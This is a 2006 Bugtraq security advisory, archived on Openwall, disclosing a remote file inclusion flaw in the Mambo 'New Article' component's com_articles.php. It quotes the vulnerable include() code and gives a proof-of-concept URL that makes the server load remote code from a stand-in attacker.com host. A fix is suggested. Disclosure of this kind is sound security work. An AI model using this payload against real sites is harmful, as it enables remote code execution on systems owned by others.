lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 17 Jul 2006 06:46:04 -0000
From: matdhule@...il.com
To: bugtraq@...urityfocus.com
Subject: New Article Mambo Component <= 1.0 (com_articles.php) Remote File
 Include Vulnerabilities

---------------------------------------------------------------------------------
New Article Mambo Component <= 1.0 (com_articles.php) Remote File Include Vulnerabilities
---------------------------------------------------------------------------------

Author          : Ahmad Maulana a.k.a Matdhule
Date            : July 17th 2006
Location        : Indonesia, Jakarta
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : New Article Component (com_articles.php)

Version : 1.0

---------------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~

In folder components we found vulnerability script com_articles.php.

-----------------------com_articles.php---------------------------------
<?php

include($absolute_path.'/language/'.$lang.'/lang_articles.php');

require("classes/html/com_articles.php");
$articles = new articles();

Variables $absolute_path are not properly sanitized. When register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.
 
Proof Of Concept:
~~~~~~~~~~~~~~~~

http://[target]/[path]/components/com_articles.php?absolute_path=http://attacker.com/evil.txt?

---------------------------------------------------------------------------------

Solution:
~~~~~~~~
 
sanitize variabel $absolute_path.
 
 
------------------------------------------------------------------------
---
Shoutz:
~~~~~~
~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@...oogroups.com, jasakom_perjuangan@...oogroups.com
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~~~~
 
     matdhule[at]gmail[dot]com
     
-------------------------------- [ EOF ]----------------------------------
 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ